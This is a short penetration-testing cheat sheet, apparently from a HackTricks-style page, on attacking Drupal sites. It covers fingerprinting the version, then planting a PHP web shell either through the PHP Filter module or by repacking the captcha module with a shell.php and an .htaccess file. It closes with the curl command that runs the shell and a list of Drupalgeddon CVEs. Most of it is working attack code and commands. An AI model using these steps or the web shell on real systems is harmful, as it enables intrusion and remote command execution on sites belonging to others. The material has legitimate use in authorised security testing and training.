Drupal

Introduction

Drupal | HackTricks

Enumeration

Footprinting:

curl -s http://<url> | grep Drupal

Version Enumeration:

curl -s http://<url>/CHANGELOG.txt | grep -m2 ""

  • Would not work on later versions of Drupal.

Automated Scan:

droopescan:

droopescan scan drupal --url http://<url>

Attacking Drupal

Require Admin access.

PHP Filter Module:

Before version 8:

It is possible to login as admin and enable the PHP filer module to allow embedded PHP codes to be executed.

  • Under Module. Then save configuration

Then we can create a new page under Content, and place our web shell code:

system($_GET[cmd]);

  • Then visit the php page with ?cmd=<command>

  • Make suer the Text format drop down is set to PHP Code.

After version 8:

We would have to install the module ourselves by uploading the module archive.

https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Uploading a Backdoored Module:

Download and extract a normal module:

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

Create a php web shell:

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

Create a .htaccess file:

Drupal in default does not allow access to /module folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Move all files into the Module and Create an archive:

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

  • Then install this new module on Drupal.

Executing the web shell:

curl -s <url>/modules/captcha/shell.php?cmd=id

Known Vulnerabilities:

  • Versions 7.0 up to 7.31 - CVE-2014-3704 (Drupalgeddon) Pre-auth SQL injection

  • Versions 7.58 to 8.5 - CVE-2018-7600 (Drupalgeddon2) Remote Code Execution

  • Multiple Versions 7.x and 8.x. - CVE-2018-7602 (Drupalgeddon3) Remote Code Execution

Last updated